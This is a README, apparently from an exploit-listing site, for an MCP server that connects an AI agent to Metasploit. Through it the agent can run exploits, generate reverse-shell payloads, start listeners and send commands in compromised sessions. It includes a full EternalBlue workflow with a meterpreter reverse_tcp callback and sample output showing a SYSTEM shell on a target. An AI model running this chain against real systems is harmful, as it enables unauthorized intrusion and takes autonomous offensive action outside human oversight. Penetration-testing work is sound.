Share
## https://sploitus.com/exploit?id=093B2387-CEEC-59D2-8971-57C35E287F2F
# metasploit-mcp

Metasploit Framework MCP server for exploit execution, session management, and payload generation via the Model Context Protocol.

## Requirements

- Python 3.10+
- [uv](https://github.com/astral-sh/uv)
- [msfrpcd](https://docs.metasploit.com/docs/using-metasploit/intermediate/rpc/how-to-use-msfrpc.html) running and reachable

## Quick Start

Start msfrpcd:

```bash
msfrpcd -P msf -S -a 127.0.0.1
```

Run the server:

```bash
MSF_PASSWORD=msf uv run server.py
```

Or with SSE transport (for containerized / remote deployment):

```bash
MSF_PASSWORD=msf MCP_TRANSPORT=sse PORT=3007 uv run server.py
```

Add to `.mcp.json` for Claude Code:

```json
{
  "metasploit-mcp": {
    "command": "uv",
    "args": ["run", "/path/to/metasploit-mcp/server.py"],
    "cwd": "/path/to/metasploit-mcp",
    "env": {
      "MSF_PASSWORD": "msf"
    }
  }
}
```

The server verifies msfrpcd is reachable at startup and exits with a clear error if the connection fails.

## Transport

| Env Var | Default | Description |
|---------|---------|-------------|
| `MCP_TRANSPORT` | `stdio` | Transport mode: `stdio` or `sse` |
| `HOST` | `0.0.0.0` | Bind address (SSE mode) |
| `PORT` | `3007` | Listen port (SSE mode) |

## Configuration

| Env Var | Default | Description |
|---------|---------|-------------|
| `MSF_PASSWORD` | `msf` | msfrpcd authentication password |
| `MSF_SERVER` | `127.0.0.1` | msfrpcd host address |
| `MSF_PORT` | `55553` | msfrpcd port |
| `MSF_SSL` | `true` | Use SSL for RPC connection (`false` for localhost) |
| `PAYLOAD_SAVE_DIR` | `/tmp/msf-payloads` | Directory for generated payload files |

## Tools

### Modules (2)

| Tool | Description |
|------|-------------|
| `search_modules` | Search modules by name, CVE, or keyword |
| `module_info` | Get detailed module info: options, references, targets, compatible payloads |

### Exploitation (3)

| Tool | Description |
|------|-------------|
| `run_exploit` | Run an exploit module against a target (RPC async or console sync) |
| `run_auxiliary` | Run an auxiliary module (scanner, fuzzer, etc.) |
| `run_post` | Run a post-exploitation module against an active session |

### Payloads (1)

| Tool | Description |
|------|-------------|
| `generate_payload` | Generate a payload file server-side (ELF, EXE, raw, etc.) |

### Sessions (3)

| Tool | Description |
|------|-------------|
| `list_sessions` | List active sessions with type, target, and tunnel info |
| `session_command` | Execute a command in a meterpreter or shell session |
| `close_session` | Terminate an active session |

### Handlers & Jobs (3)

| Tool | Description |
|------|-------------|
| `start_handler` | Start a multi/handler listener for reverse connections |
| `list_jobs` | List all active background jobs |
| `stop_job` | Stop a running background job |

## Workflow

```
1. search_modules(query="eternalblue")
2. module_info(type="exploit", name="windows/smb/ms17_010_eternalblue")
3. start_handler(payload="windows/x64/meterpreter/reverse_tcp", lhost="10.0.0.1", lport=4444)
4. run_exploit(
     module="windows/smb/ms17_010_eternalblue",
     options="RHOSTS=10.0.0.5",
     payload="windows/x64/meterpreter/reverse_tcp",
     payload_options="LHOST=10.0.0.1,LPORT=4444"
   )
5. list_sessions()
6. session_command(session_id=1, command="sysinfo")
7. run_post(module="multi/gather/env", session_id=1)

-- Cleanup --
8. close_session(session_id=1)
9. stop_job(job_id=0)
```

## Output Format

### run_exploit (console mode)

```json
{
  "module": "exploit/windows/smb/ms17_010_eternalblue",
  "output": "[*] Started reverse TCP handler on 10.0.0.1:4444\n[*] 10.0.0.5:445 - Executing...\n[+] 10.0.0.5:445 - ETERNALBLUE overwrite completed\n[*] Meterpreter session 1 opened",
  "status": "session_opened",
  "session_id": 1,
  "label": "exploit-2026-03-04T..."
}
```

### list_sessions

```json
[
  {
    "session_id": 1,
    "type": "meterpreter",
    "info": "NT AUTHORITY\\SYSTEM @ WIN-TARGET",
    "tunnel_local": "10.0.0.1:4444",
    "tunnel_peer": "10.0.0.5:49152",
    "via_exploit": "exploit/windows/smb/ms17_010_eternalblue",
    "via_payload": "payload/windows/x64/meterpreter/reverse_tcp",
    "target_host": "10.0.0.5",
    "platform": "windows",
    "arch": "x64"
  }
]
```

### generate_payload

```json
{
  "path": "/tmp/msf-payloads/linux_x64_shell_reverse_tcp.elf",
  "size_bytes": 194,
  "format": "elf",
  "payload": "linux/x64/shell_reverse_tcp",
  "label": "payload-2026-03-04T..."
}
```

### search_modules

```json
[
  {
    "type": "exploit",
    "name": "windows/smb/ms17_010_eternalblue",
    "fullname": "exploit/windows/smb/ms17_010_eternalblue"
  },
  {
    "type": "auxiliary",
    "name": "scanner/smb/smb_ms17_010",
    "fullname": "auxiliary/scanner/smb/smb_ms17_010"
  }
]
```

## Resources

- `msf://status` -- RPC connection status, version, active jobs and sessions count
- `msf://sessions` -- all active sessions with details
- `msf://payloads` -- all generated payloads in the registry

## Prompts

- `exploit_planning` -- plan exploitation approach based on target and discovered services
- `post_recon` -- post-exploitation reconnaissance on an active session

## Security

- Module names validated against strict alphanumeric/slash/hyphen/underscore regex
- Session IDs validated as integers and checked against active session list
- Payload filenames sanitized (non-alphanumeric characters replaced with underscores)
- Save directory is server-controlled, not user-specified
- All execution goes through msfrpcd RPC, no subprocess calls with user input
- `MSF_SSL=false` only intended for localhost; defaults to `true` for remote connections